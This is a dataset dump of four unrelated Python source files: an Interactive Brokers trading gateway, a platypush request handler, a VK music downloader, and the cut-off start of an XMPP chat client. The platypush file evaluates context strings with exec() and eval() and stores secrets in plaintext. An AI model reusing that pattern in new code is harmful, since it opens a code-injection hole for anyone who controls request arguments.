source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
ib_gateway.py
|
"""
IB Symbol Rules
SPY-USD-STK SMART
EUR-USD-CASH IDEALPRO
XAUUSD-USD-CMDTY SMART
ES-202002-USD-FUT GLOBEX
"""
from copy import copy
from datetime import datetime
from queue import Empty
from threading import Thread, Condition
from typing import Optional
import shelve
from tzlocal import get_localzone
from ibapi import comm
from ibapi.client import EClient
from ibapi.common import MAX_MSG_LEN, NO_VALID_ID, OrderId, TickAttrib, TickerId
from ibapi.contract import Contract, ContractDetails
from ibapi.execution import Execution
from ibapi.order import Order
from ibapi.order_state import OrderState
from ibapi.ticktype import TickType, TickTypeEnum
from ibapi.wrapper import EWrapper
from ibapi.errors import BAD_LENGTH
from ibapi.common import BarData as IbBarData
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
BarData,
OrderRequest,
CancelRequest,
SubscribeRequest,
HistoryRequest
)
from vnpy.trader.constant import (
Product,
OrderType,
Direction,
Exchange,
Currency,
Status,
OptionType,
Interval
)
from vnpy.trader.utility import get_file_path
ORDERTYPE_VT2IB = {
OrderType.LIMIT: "LMT",
OrderType.MARKET: "MKT",
OrderType.STOP: "STP"
}
ORDERTYPE_IB2VT = {v: k for k, v in ORDERTYPE_VT2IB.items()}
DIRECTION_VT2IB = {Direction.LONG: "BUY", Direction.SHORT: "SELL"}
DIRECTION_IB2VT = {v: k for k, v in DIRECTION_VT2IB.items()}
DIRECTION_IB2VT["BOT"] = Direction.LONG
DIRECTION_IB2VT["SLD"] = Direction.SHORT
EXCHANGE_VT2IB = {
Exchange.SMART: "SMART",
Exchange.NYMEX: "NYMEX",
Exchange.GLOBEX: "GLOBEX",
Exchange.IDEALPRO: "IDEALPRO",
Exchange.CME: "CME",
Exchange.ICE: "ICE",
Exchange.SEHK: "SEHK",
Exchange.HKFE: "HKFE",
Exchange.CFE: "CFE",
Exchange.NYSE: "NYSE",
Exchange.NASDAQ: "NASDAQ",
Exchange.ARCA: "ARCA"
}
EXCHANGE_IB2VT = {v: k for k, v in EXCHANGE_VT2IB.items()}
STATUS_IB2VT = {
"ApiPending": Status.SUBMITTING,
"PendingSubmit": Status.SUBMITTING,
"PreSubmitted": Status.NOTTRADED,
"Submitted": Status.NOTTRADED,
"ApiCancelled": Status.CANCELLED,
"Cancelled": Status.CANCELLED,
"Filled": Status.ALLTRADED,
"Inactive": Status.REJECTED,
}
PRODUCT_IB2VT = {
"STK": Product.EQUITY,
"CASH": Product.FOREX,
"CMDTY": Product.SPOT,
"FUT": Product.FUTURES,
"OPT": Product.OPTION,
"FOT": Product.OPTION
}
OPTION_VT2IB = {OptionType.CALL: "CALL", OptionType.PUT: "PUT"}
CURRENCY_VT2IB = {
Currency.USD: "USD",
Currency.CNY: "CNY",
Currency.HKD: "HKD",
}
TICKFIELD_IB2VT = {
0: "bid_volume_1",
1: "bid_price_1",
2: "ask_price_1",
3: "ask_volume_1",
4: "last_price",
5: "last_volume",
6: "high_price",
7: "low_price",
8: "volume",
9: "pre_close",
14: "open_price",
}
ACCOUNTFIELD_IB2VT = {
"NetLiquidationByCurrency": "balance",
"NetLiquidation": "balance",
"UnrealizedPnL": "positionProfit",
"AvailableFunds": "available",
"MaintMarginReq": "margin",
}
INTERVAL_VT2IB = {
Interval.MINUTE: "1 min",
Interval.HOUR: "1 hour",
Interval.DAILY: "1 day",
}
JOIN_SYMBOL = "-"
class IbGateway(BaseGateway):
""""""
default_setting = {
"TWS地址": "127.0.0.1",
"TWS端口": 7497,
"客户号": 1,
"交易账户": ""
}
exchanges = list(EXCHANGE_VT2IB.keys())
def __init__(self, event_engine):
""""""
super().__init__(event_engine, "IB")
self.api = IbApi(self)
def connect(self, setting: dict):
"""
Start gateway connection.
"""
host = setting["TWS地址"]
port = setting["TWS端口"]
clientid = setting["客户号"]
account = setting["交易账户"]
self.api.connect(host, port, clientid, account)
def close(self):
"""
Close gateway connection.
"""
self.api.close()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
self.api.subscribe(req)
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
return self.api.send_order(req)
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
self.api.cancel_order(req)
def query_account(self):
"""
Query account balance.
"""
pass
def query_position(self):
"""
Query holding positions.
"""
pass
def query_history(self, req: HistoryRequest):
""""""
return self.api.query_history(req)
class IbApi(EWrapper):
""""""
data_filename = "ib_contract_data.db"
data_filepath = str(get_file_path(data_filename))
local_tz = get_localzone()
def __init__(self, gateway: BaseGateway):
""""""
super().__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.status = False
self.reqid = 0
self.orderid = 0
self.clientid = 0
self.account = ""
self.ticks = {}
self.orders = {}
self.accounts = {}
self.contracts = {}
self.tick_exchange = {}
self.history_req = None
self.history_condition = Condition()
self.history_buf = []
self.client = IbClient(self)
self.thread = Thread(target=self.client.run)
def connectAck(self): # pylint: disable=invalid-name
"""
Callback when connection is established.
"""
self.status = True
self.gateway.write_log("IB TWS连接成功")
self.load_contract_data()
def connectionClosed(self): # pylint: disable=invalid-name
"""
Callback when connection is closed.
"""
self.status = False
self.gateway.write_log("IB TWS连接断开")
def nextValidId(self, orderId: int): # pylint: disable=invalid-name
"""
Callback of next valid orderid.
"""
super().nextValidId(orderId)
if not self.orderid:
self.orderid = orderId
def currentTime(self, time: int): # pylint: disable=invalid-name
"""
Callback of current server time of IB.
"""
super().currentTime(time)
dt = datetime.fromtimestamp(time)
time_string = dt.strftime("%Y-%m-%d %H:%M:%S.%f")
msg = f"服务器时间: {time_string}"
self.gateway.write_log(msg)
def error(
self, reqId: TickerId, errorCode: int, errorString: str
): # pylint: disable=invalid-name
"""
Callback of error caused by specific request.
"""
super().error(reqId, errorCode, errorString)
msg = f"信息通知,代码:{errorCode},内容: {errorString}"
self.gateway.write_log(msg)
def tickPrice( # pylint: disable=invalid-name
self, reqId: TickerId, tickType: TickType, price: float, attrib: TickAttrib
):
"""
Callback of tick price update.
"""
super().tickPrice(reqId, tickType, price, attrib)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, price)
# Update name into tick data.
contract = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
# Forex and spot product of IDEALPRO has no tick time and last price.
# We need to calculate locally.
exchange = self.tick_exchange[reqId]
if exchange is Exchange.IDEALPRO:
tick.last_price = (tick.bid_price_1 + tick.ask_price_1) / 2
tick.datetime = datetime.now(self.local_tz)
self.gateway.on_tick(copy(tick))
def tickSize(
self, reqId: TickerId, tickType: TickType, size: int
): # pylint: disable=invalid-name
"""
Callback of tick volume update.
"""
super().tickSize(reqId, tickType, size)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, size)
self.gateway.on_tick(copy(tick))
def tickString(
self, reqId: TickerId, tickType: TickType, value: str
): # pylint: disable=invalid-name
"""
Callback of tick string update.
"""
super().tickString(reqId, tickType, value)
if tickType != TickTypeEnum.LAST_TIMESTAMP:
return
tick = self.ticks[reqId]
dt = datetime.fromtimestamp(int(value))
tick.datetime = dt.replace(tzinfo=self.local_tz)
self.gateway.on_tick(copy(tick))
def orderStatus( # pylint: disable=invalid-name
self,
orderId: OrderId,
status: str,
filled: float,
remaining: float,
avgFillPrice: float,
permId: int,
parentId: int,
lastFillPrice: float,
clientId: int,
whyHeld: str,
mktCapPrice: float,
):
"""
Callback of order status update.
"""
super().orderStatus(
orderId,
status,
filled,
remaining,
avgFillPrice,
permId,
parentId,
lastFillPrice,
clientId,
whyHeld,
mktCapPrice,
)
orderid = str(orderId)
order = self.orders.get(orderid, None)
order.traded = filled
# To filter PendingCancel status
order_status = STATUS_IB2VT.get(status, None)
if order_status:
order.status = order_status
self.gateway.on_order(copy(order))
def openOrder( # pylint: disable=invalid-name
self,
orderId: OrderId,
ib_contract: Contract,
ib_order: Order,
orderState: OrderState,
):
"""
Callback when opening new order.
"""
super().openOrder(
orderId, ib_contract, ib_order, orderState
)
orderid = str(orderId)
order = OrderData(
symbol=ib_contract.conId,
exchange=EXCHANGE_IB2VT.get(
ib_contract.exchange, ib_contract.exchange),
type=ORDERTYPE_IB2VT[ib_order.orderType],
orderid=orderid,
direction=DIRECTION_IB2VT[ib_order.action],
volume=ib_order.totalQuantity,
gateway_name=self.gateway_name,
)
if order.type == OrderType.LIMIT:
order.price = ib_order.lmtPrice
elif order.type == OrderType.STOP:
order.price = ib_order.auxPrice
self.orders[orderid] = order
self.gateway.on_order(copy(order))
def updateAccountValue( # pylint: disable=invalid-name
self, key: str, val: str, currency: str, accountName: str
):
"""
Callback of account update.
"""
super().updateAccountValue(key, val, currency, accountName)
if not currency or key not in ACCOUNTFIELD_IB2VT:
return
accountid = f"{accountName}.{currency}"
account = self.accounts.get(accountid, None)
if not account:
account = AccountData(accountid=accountid,
gateway_name=self.gateway_name)
self.accounts[accountid] = account
name = ACCOUNTFIELD_IB2VT[key]
setattr(account, name, float(val))
def updatePortfolio( # pylint: disable=invalid-name
self,
contract: Contract,
position: float,
marketPrice: float,
marketValue: float,
averageCost: float,
unrealizedPNL: float,
realizedPNL: float,
accountName: str,
):
"""
Callback of position update.
"""
super().updatePortfolio(
contract,
position,
marketPrice,
marketValue,
averageCost,
unrealizedPNL,
realizedPNL,
accountName,
)
if contract.exchange:
exchange = EXCHANGE_IB2VT.get(contract.exchange, None)
elif contract.primaryExchange:
exchange = EXCHANGE_IB2VT.get(contract.primaryExchange, None)
else:
exchange = Exchange.SMART # Use smart routing for default
if not exchange:
msg = f"存在不支持的交易所持仓{contract.conId} {contract.exchange} {contract.primaryExchange}"
self.gateway.write_log(msg)
return
try:
ib_size = int(contract.multiplier)
except ValueError:
ib_size = 1
price = averageCost / ib_size
pos = PositionData(
symbol=generate_symbol(contract),
exchange=exchange,
direction=Direction.NET,
volume=position,
price=price,
pnl=unrealizedPNL,
gateway_name=self.gateway_name,
)
self.gateway.on_position(pos)
def updateAccountTime(self, timeStamp: str): # pylint: disable=invalid-name
"""
Callback of account update time.
"""
super().updateAccountTime(timeStamp)
for account in self.accounts.values():
self.gateway.on_account(copy(account))
def contractDetails(self, reqId: int, contractDetails: ContractDetails): # pylint: disable=invalid-name
"""
Callback of contract data update.
"""
super().contractDetails(reqId, contractDetails)
# Generate symbol from ib contract details
ib_contract = contractDetails.contract
if not ib_contract.multiplier:
ib_contract.multiplier = 1
symbol = generate_symbol(ib_contract)
# Generate contract
contract = ContractData(
symbol=symbol,
exchange=EXCHANGE_IB2VT[ib_contract.exchange],
name=contractDetails.longName,
product=PRODUCT_IB2VT[ib_contract.secType],
size=ib_contract.multiplier,
pricetick=contractDetails.minTick,
net_position=True,
history_data=True,
stop_supported=True,
gateway_name=self.gateway_name,
)
if contract.vt_symbol not in self.contracts:
self.gateway.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
self.save_contract_data()
def execDetails(
self, reqId: int, contract: Contract, execution: Execution
): # pylint: disable=invalid-name
"""
Callback of trade data update.
"""
super().execDetails(reqId, contract, execution)
dt = datetime.strptime(execution.time, "%Y%m%d %H:%M:%S")
dt = dt.replace(tzinfo=self.local_tz)
trade = TradeData(
symbol=contract.conId,
exchange=EXCHANGE_IB2VT.get(contract.exchange, contract.exchange),
orderid=str(execution.orderId),
tradeid=str(execution.execId),
direction=DIRECTION_IB2VT[execution.side],
price=execution.price,
volume=execution.shares,
datetime=dt,
gateway_name=self.gateway_name,
)
self.gateway.on_trade(trade)
def managedAccounts(self, accountsList: str):
"""
Callback of all sub accountid.
"""
super().managedAccounts(accountsList)
if not self.account:
for account_code in accountsList.split(","):
self.account = account_code
self.gateway.write_log(f"当前使用的交易账号为{self.account}")
self.client.reqAccountUpdates(True, self.account)
def historicalData(self, reqId: int, ib_bar: IbBarData):
"""
Callback of history data update.
"""
dt = datetime.strptime(ib_bar.date, "%Y%m%d %H:%M:%S")
dt = dt.replace(tzinfo=self.local_tz)
bar = BarData(
symbol=self.history_req.symbol,
exchange=self.history_req.exchange,
datetime=dt,
interval=self.history_req.interval,
volume=ib_bar.volume,
open_price=ib_bar.open,
high_price=ib_bar.high,
low_price=ib_bar.low,
close_price=ib_bar.close,
gateway_name=self.gateway_name
)
self.history_buf.append(bar)
def historicalDataEnd(self, reqId: int, start: str, end: str):
"""
Callback of history data finished.
"""
self.history_condition.acquire()
self.history_condition.notify()
self.history_condition.release()
def connect(self, host: str, port: int, clientid: int, account: str):
"""
Connect to TWS.
"""
if self.status:
return
self.clientid = clientid
self.account = account
self.client.connect(host, port, clientid)
self.thread.start()
self.client.reqCurrentTime()
def close(self):
"""
Disconnect to TWS.
"""
if not self.status:
return
self.status = False
self.client.disconnect()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
if not self.status:
return
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所{req.exchange}")
return
# Extract ib contract detail
ib_contract = generate_ib_contract(req.symbol, req.exchange)
if not ib_contract:
self.gateway.write_log("代码解析失败,请检查格式是否正确")
return
# Get contract data from TWS.
self.reqid += 1
self.client.reqContractDetails(self.reqid, ib_contract)
# Subscribe tick data and create tick object buffer.
self.reqid += 1
self.client.reqMktData(self.reqid, ib_contract, "", False, False, [])
tick = TickData(
symbol=req.symbol,
exchange=req.exchange,
datetime=datetime.now(self.local_tz),
gateway_name=self.gateway_name,
)
self.ticks[self.reqid] = tick
self.tick_exchange[self.reqid] = req.exchange
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
if not self.status:
return ""
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所:{req.exchange}")
return ""
if req.type not in ORDERTYPE_VT2IB:
self.gateway.write_log(f"不支持的价格类型:{req.type}")
return ""
self.orderid += 1
ib_contract = generate_ib_contract(req.symbol, req.exchange)
if not ib_contract:
return ""
ib_order = Order()
ib_order.orderId = self.orderid
ib_order.clientId = self.clientid
ib_order.action = DIRECTION_VT2IB[req.direction]
ib_order.orderType = ORDERTYPE_VT2IB[req.type]
ib_order.totalQuantity = req.volume
ib_order.account = self.account
if req.type == OrderType.LIMIT:
ib_order.lmtPrice = req.price
elif req.type == OrderType.STOP:
ib_order.auxPrice = req.price
self.client.placeOrder(self.orderid, ib_contract, ib_order)
self.client.reqIds(1)
order = req.create_order_data(str(self.orderid), self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
if not self.status:
return
self.client.cancelOrder(int(req.orderid))
def query_history(self, req: HistoryRequest):
""""""
self.history_req = req
self.reqid += 1
ib_contract = generate_ib_contract(req.symbol, req.exchange)
if req.end:
end = req.end
end_str = end.strftime("%Y%m%d %H:%M:%S")
else:
end = datetime.now()
end_str = ""
delta = end - req.start
days = min(delta.days, 180) # IB only provides 6-month data
duration = f"{days} D"
bar_size = INTERVAL_VT2IB[req.interval]
if req.exchange == Exchange.IDEALPRO:
bar_type = "MIDPOINT"
else:
bar_type = "TRADES"
self.client.reqHistoricalData(
self.reqid,
ib_contract,
end_str,
duration,
bar_size,
bar_type,
1,
1,
False,
[]
)
self.history_condition.acquire() # Wait for async data return
self.history_condition.wait()
self.history_condition.release()
history = self.history_buf
self.history_buf = [] # Create new buffer list
self.history_req = None
return history
def load_contract_data(self):
""""""
f = shelve.open(self.data_filepath)
self.contracts = f.get("contracts", {})
f.close()
for contract in self.contracts.values():
self.gateway.on_contract(contract)
self.gateway.write_log("本地缓存合约信息加载成功")
def save_contract_data(self):
""""""
f = shelve.open(self.data_filepath)
f["contracts"] = self.contracts
f.close()
class IbClient(EClient):
""""""
def run(self):
"""
Reimplement the original run message loop of eclient.
Remove all unnecessary try...catch... and allow exceptions to interrupt loop.
"""
while not self.done and self.isConnected():
try:
text = self.msg_queue.get(block=True, timeout=0.2)
if len(text) > MAX_MSG_LEN:
errorMsg = "%s:%d:%s" % (BAD_LENGTH.msg(), len(text), text)
self.wrapper.error(
NO_VALID_ID, BAD_LENGTH.code(), errorMsg
)
self.disconnect()
break
fields = comm.read_fields(text)
self.decoder.interpret(fields)
except Empty:
pass
def generate_ib_contract(symbol: str, exchange: Exchange) -> Optional[Contract]:
""""""
try:
fields = symbol.split(JOIN_SYMBOL)
ib_contract = Contract()
ib_contract.exchange = EXCHANGE_VT2IB[exchange]
ib_contract.secType = fields[-1]
ib_contract.currency = fields[-2]
ib_contract.symbol = fields[0]
if ib_contract.secType in ["FUT", "OPT", "FOP"]:
ib_contract.lastTradeDateOrContractMonth = fields[1]
if ib_contract.secType in ["OPT", "FOP"]:
ib_contract.right = fields[2]
ib_contract.strike = float(fields[3])
ib_contract.multiplier = int(fields[4])
except IndexError:
ib_contract = None
return ib_contract
def generate_symbol(ib_contract: Contract) -> str:
""""""
fields = [ib_contract.symbol]
if ib_contract.secType in ["FUT", "OPT", "FOP"]:
fields.append(ib_contract.lastTradeDateOrContractMonth)
if ib_contract.secType in ["OPT", "FOP"]:
fields.append(ib_contract.right)
fields.append(str(ib_contract.strike))
fields.append(str(ib_contract.multiplier))
fields.append(ib_contract.currency)
fields.append(ib_contract.secType)
symbol = JOIN_SYMBOL.join(fields)
return symbol
|
__init__.py
|
import copy
import datetime
import json
import logging
import random
import re
import time
from threading import Thread
from platypush.config import Config
from platypush.context import get_plugin
from platypush.message import Message
from platypush.message.response import Response
from platypush.utils import get_hash, get_module_and_method_from_action, get_redis_queue_name_by_message, \
is_functional_procedure
logger = logging.getLogger('platypush')
class Request(Message):
""" Request message class """
def __init__(self, target, action, origin=None, id=None, backend=None,
args=None, token=None, timestamp=None):
"""
Params:
target -- Target node [Str]
action -- Action to be executed (e.g. music.mpd.play) [Str]
origin -- Origin node [Str]
id -- Message ID, or None to get it auto-generated
backend -- Backend connected to the request, where the response will be delivered
args -- Additional arguments for the action [Dict]
token -- Authorization token, if required on the server [Str]
timestamp -- Message creation timestamp [Float]
"""
super().__init__(timestamp=timestamp)
self.id = id if id else self._generate_id()
self.target = target
self.action = action
self.origin = origin
self.args = args if args else {}
self.backend = backend
self.token = token
@classmethod
def build(cls, msg):
msg = super().parse(msg)
args = {'target': msg.get('target', Config.get('device_id')), 'action': msg['action'],
'args': msg.get('args', {}), 'id': msg['id'] if 'id' in msg else cls._generate_id(),
'timestamp': msg['_timestamp'] if '_timestamp' in msg else time.time()}
if 'origin' in msg:
args['origin'] = msg['origin']
if 'token' in msg:
args['token'] = msg['token']
return cls(**args)
@staticmethod
def _generate_id():
_id = ''
for i in range(0, 16):
_id += '%.2x' % random.randint(0, 255)
return _id
def _execute_procedure(self, *args, **kwargs):
from platypush.config import Config
from platypush.procedure import Procedure
logger.info('Executing procedure request: {}'.format(self.action))
procedures = Config.get_procedures()
proc_name = '.'.join(self.action.split('.')[1:])
if proc_name not in procedures:
proc_name = self.action.split('.')[-1]
proc_config = procedures[proc_name]
if is_functional_procedure(proc_config):
kwargs.update(**self.args)
if 'n_tries' in kwargs:
del kwargs['n_tries']
return proc_config(*args, **kwargs)
proc = Procedure.build(name=proc_name, requests=proc_config['actions'],
_async=proc_config['_async'], args=self.args,
backend=self.backend, id=self.id)
return proc.execute(*args, **kwargs)
def _expand_context(self, event_args=None, **context):
from platypush.config import Config
if event_args is None:
event_args = copy.deepcopy(self.args)
constants = Config.get_constants()
context['constants'] = {}
for (name, value) in constants.items():
context['constants'][name] = value
keys = []
if isinstance(event_args, dict):
keys = event_args.keys()
elif isinstance(event_args, list):
keys = range(0, len(event_args))
for key in keys:
value = event_args[key]
if isinstance(value, str):
value = self.expand_value_from_context(value, **context)
elif isinstance(value, dict) or isinstance(value, list):
self._expand_context(event_args=value, **context)
event_args[key] = value
return event_args
# noinspection PyBroadException
@classmethod
def expand_value_from_context(cls, _value, **context):
for (k, v) in context.items():
if isinstance(v, Message):
v = json.loads(str(v))
try:
exec('{}={}'.format(k, v))
except:
if isinstance(v, str):
try:
exec('{}="{}"'.format(k, re.sub('(^|[^\\\])"', '\1\\"', v)))
except:
pass
parsed_value = ''
if not isinstance(_value, str):
parsed_value = _value
while _value and isinstance(_value, str):
m = re.match('([^$]*)(\${\s*(.+?)\s*})(.*)', _value)
if m and not m.group(1).endswith('\\'):
prefix = m.group(1)
expr = m.group(2)
inner_expr = m.group(3)
_value = m.group(4)
try:
context_value = eval(inner_expr)
if callable(context_value):
context_value = context_value()
if isinstance(context_value, range) or isinstance(context_value, tuple):
context_value = [*context_value]
if isinstance(context_value, datetime.date):
context_value = context_value.isoformat()
except Exception as e:
logger.exception(e)
context_value = expr
parsed_value += prefix + (
json.dumps(context_value)
if isinstance(context_value, list) or isinstance(context_value, dict)
else str(context_value)
)
else:
parsed_value += _value
_value = ''
try:
return json.loads(parsed_value)
except:
return parsed_value
def _send_response(self, response):
response = Response.build(response)
response.id = self.id
response.target = self.origin
response.origin = Config.get('device_id')
if self.backend and self.origin:
self.backend.send_response(response=response, request=self)
else:
redis = get_plugin('redis')
if redis:
queue_name = get_redis_queue_name_by_message(self)
redis.send_message(queue_name, response)
redis.expire(queue_name, 60)
def execute(self, n_tries=1, _async=True, **context):
"""
Execute this request and returns a Response object
Params:
n_tries -- Number of tries in case of failure before raising a RuntimeError
_async -- If True, the request will be run asynchronously and the
response posted on the bus when available (default),
otherwise the current thread will wait for the response
to be returned synchronously.
context -- Key-valued context. Example:
context = (group_name='Kitchen lights')
request.args:
- group: ${group_name} # will be expanded as "Kitchen lights")
"""
def _thread_func(_n_tries, errors=None):
response = None
if self.action.startswith('procedure.'):
context['n_tries'] = _n_tries
response = self._execute_procedure(**context)
if response is not None:
self._send_response(response)
return response
# utils.get_context is a special action that simply returns the current context
elif self.action == 'utils.get_context':
response = Response(output=context)
self._send_response(response)
return response
else:
action = self.expand_value_from_context(self.action, **context)
(module_name, method_name) = get_module_and_method_from_action(action)
plugin = get_plugin(module_name)
try:
# Run the action
args = self._expand_context(**context)
args = self.expand_value_from_context(args, **context)
if isinstance(args, dict):
response = plugin.run(method_name, **args)
elif isinstance(args, list):
response = plugin.run(method_name, *args)
else:
response = plugin.run(method_name, args)
if not response:
logger.warning('Received null response from action {}'.format(action))
else:
if response.is_error():
logger.warning(('Response processed with errors from ' +
'action {}: {}').format(
action, str(response)))
elif not response.disable_logging:
logger.info('Processed response from action {}: {}'.
format(action, str(response)))
except AssertionError as e:
plugin.logger.exception(e)
logger.warning('Assertion error from action [{}]: {}'.format(action, str(e)))
response = Response(output=None, errors=[str(e)])
except Exception as e:
# Retry mechanism
plugin.logger.exception(e)
logger.warning(('Uncaught exception while processing response ' +
'from action [{}]: {}').format(action, str(e)))
errors = errors or []
if str(e) not in errors:
errors.append(str(e))
response = Response(output=None, errors=errors)
if _n_tries - 1 > 0:
logger.info('Reloading plugin {} and retrying'.format(module_name))
get_plugin(module_name, reload=True)
response = _thread_func(_n_tries=_n_tries-1, errors=errors)
finally:
self._send_response(response)
return response
token_hash = Config.get('token_hash')
if token_hash:
if self.token is None or get_hash(self.token) != token_hash:
raise PermissionError()
if _async:
Thread(target=_thread_func, args=(n_tries,)).start()
else:
return _thread_func(n_tries)
def __str__(self):
"""
Overrides the str() operator and converts
the message into a UTF-8 JSON string
"""
return json.dumps({
'type': 'request',
'target': self.target,
'action': self.action,
'args': self.args,
'origin': self.origin if hasattr(self, 'origin') else None,
'id': self.id if hasattr(self, 'id') else None,
'token': self.token if hasattr(self, 'token') else None,
'_timestamp': self.timestamp,
})
# vim:sw=4:ts=4:et:
|
vk_music.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
from collections import Counter
import os
import json
import Queue
import threading
import traceback
from six.moves import input as read_input
from six.moves import urllib
from .utils import prnt, replace_chars
from .exceptions import *
from .consts import SAVED, SKIPPED
from .utils import print_out
class Song(object):
"""
Just wrapper for interactions with storage
As functionality extending shown black_list feature
"""
def __init__(self, storage, song=None, *args, **kwargs):
"""
Init object
Prepare song name as self.name
@param storage: Song storage
@param song: Dict with artist, title and url fields or only name
@param args:
@param kwargs:
@raise TypeError:
"""
self.storage = storage
self.manager = kwargs.get('manager', None)
# Process song dict to class props
try:
self.name = song.get('name', None) or ('%s - %s.mp3' % (song['artist'].strip(), song['title'].strip()))
self.name = replace_chars(self.name, ('/', '\\', '?', '%', '*', ':', '|', '"', '<', '>', ';', '!'))
self.name = os.path.normpath(self.name)
except KeyError:
TypeError('For creation "Song" object you must provide '
'{dict}"song" argument with name or artist and title')
self.url = song.get('url', None)
def save(self, **kwargs):
"""
Save song
Download from self.url and save to self.path with self.name
"""
if not hasattr(self, 'url'):
raise RuntimeError('Can not load song')
# r means remote file
r = urllib.request.urlopen(self.url)
# Such kind of manipulation need later in case of errors and broken files
return self.storage.write(self.name, r)
def remove(self):
"""
Remove file
"""
self.storage.remove(self.name)
def in_blacklist(self):
"""
Check for song must be downloaded and saved
returns True/False as Yes/Not
"""
return self.name.strip()[-8:-4] == r'-bl-'
class VkMusic(object):
# ToDo: Implement verbosity level
song_class = Song
def __init__(self, storage, *args, **kwargs):
"""
song_class=Song
Updates self.SETTINGS from kwargs
"""
self.storage = storage
self.SETTINGS = {
'client_id': None,
'uid': None,
'gid': None,
'from': 0,
'to': None,
'token_dir': '~/.vk-music',
'redirect_url': 'http://sima.pro/public/token.html',
'threads': 2
}
self.SETTINGS.update(kwargs)
# Process ~ inside path and create directory for data
self.SETTINGS['token_dir'] = os.path.expanduser(self.SETTINGS['token_dir'])
try:
os.makedirs(self.SETTINGS['token_dir'])
except OSError as e:
if e.errno != 17:
self.exit('Can\'t create data directory: %s' % e)
if (not self.SETTINGS['uid'] and not self.SETTINGS['gid']) or not self.SETTINGS['client_id']:
raise ValueError('You must provide client_id and uid or gid')
if kwargs.get('song_class'):
self.song_class = kwargs.get('song_class')
def __enter__(self):
if self.storage.exists('.lock') and not self.SETTINGS.get('force', False):
raise AlreadyRunningError()
else:
self.storage.touch('.lock')
return self
def __exit__(self, exc_type=None, exc_val=None, exc_tb=None):
try:
self.storage.remove('.lock')
except Exception as e:
print('Error in exit: %s' % e)
if exc_type:
print_out(exc_type, exc_val, exc_tb)
def get_api_url(self):
"""
Get URL for api requests
"""
try:
token = self.get_token()
except Exception as e:
self.exit('Problems within getting token: %s' % e)
url = 'https://api.vk.com/method/audio.get.json?uid=%s&access_token=%s'\
%\
(self.SETTINGS['uid'], token)
if self.SETTINGS['gid']:
url += '&gid=' + self.SETTINGS['gid']
return url
@property
def token_file(self):
return os.path.join(self.SETTINGS['token_dir'], 'token.txt')
def clear_token(self):
os.remove(self.token_file)
def store_token(self, token):
open(self.token_file, 'w').write(token)
def get_token(self, force_new=False):
if self.SETTINGS.get('token') and not force_new:
return self.SETTINGS.get('token')
try:
token = open(self.token_file, 'r').read()
except IOError:
token_url = 'https://oauth.vk.com/authorize?client_id=%(client_id)s&scope=audio,offline&redirect_uri=' \
'%(redirect_url)s&display=page&response_type=token' % self.SETTINGS
print_out("Open this URL in browser: %s\n"
"Then copy token from url: " % token_url, end="")
token = read_input()
self.store_token(token)
return token
def get_songs(self):
"""
Get songs to be downloaded
"""
s_from = self.SETTINGS['from']
s_to = self.SETTINGS['to']
retries = 3
while retries:
response = json.loads(urllib.request.urlopen(self.get_api_url()).read())
try:
response['count'] = len(response['response'])
response['response'] = response['response'][s_from:s_to]
break
except KeyError:
# Clear old token and get new
print_out('Error while fetching music, response: {}'.format(response))
self.clear_token()
self.get_token(force_new=True)
retries -= 1
return response
def synchronize(self):
"""
Main function, that does the job according configuration
e.g:
obj = VkMusic()
obj.synchronize()
"""
stats = Counter()
print_out('Fetching music list...')
songs = self.get_songs()
to_sync = {
'new': [],
'old': self.storage.files_list()
}
print_out('Starting download list to "%s"...' % self.storage.get_id())
status_stats = {
SAVED: 'saved',
SKIPPED: 'skipped'
}
# Setup queue for songs
queue = Queue.Queue()
def worker(): # Setup worker that will do all the work
while True: # why 'True'? Maybe while queue
try:
idx, song = queue.get()
print_out('{}. Downloading: {}'.format(idx, song.name))
status = song.save()
text_status = status_stats[status]
stats[text_status] += 1
print_out('{}. {}: {}'.format(idx, text_status.capitalize(), song.name))
except (OSError, urllib.error.HTTPError) as e:
print_out("Error %d: %s, %s" % (i, song.name, str(e)))
except Exception as e:
print_out("Critical error (please fill issue) %d: %s, %s" % (i, song.name, traceback.format_exc()))
finally:
queue.task_done()
i = 0
for song_info in songs['response']:
song = self.song_class(self.storage, song_info)
if song.in_blacklist():
continue
else:
to_sync['new'].append(song.name)
queue.put((i, song))
i += 1
# Setup threads
for i in range(self.SETTINGS['threads']):
t = threading.Thread(target=worker)
t.daemon = True
t.start()
queue.join() # block until all tasks are done
# Then do cleanup
if self.SETTINGS['from'] == 0 and self.SETTINGS['to'] is None:
to_remove = list(set(to_sync['old']) - set(to_sync['new']))
for i, f in enumerate(to_remove, 1):
try:
Song(self.storage, {'name': f}).remove()
stats['removed'] += 1
print_out("%s. Removed %s" % (i, f))
except OSError as e:
stats['not_removed'] += 1
print_out("{}. Error while removing {}, exc_info: {}".format(i, f, e))
print_out('That is all. Enjoy.')
return stats
def exit(self, *args, **kwargs):
self.__exit__()
print_out(*args, **kwargs)
return exit()
|
session.py
|
from slixmpp import ClientXMPP
from slixmpp.exceptions import IqError, IqTimeout
from slixmpp.xmlstream.asyncio import asyncio
from threading import Thread
from chat.menu import menu
from utils import getNeighbours, getAlgorithm, generateLSP
from graph import Graph, shortest_path
import pickle
import logging
import sys
import uuid
import blessed
import algorithms.flooding as f
import json
# Start the blessed terminal used for UI
term = blessed.Terminal()
mem = {
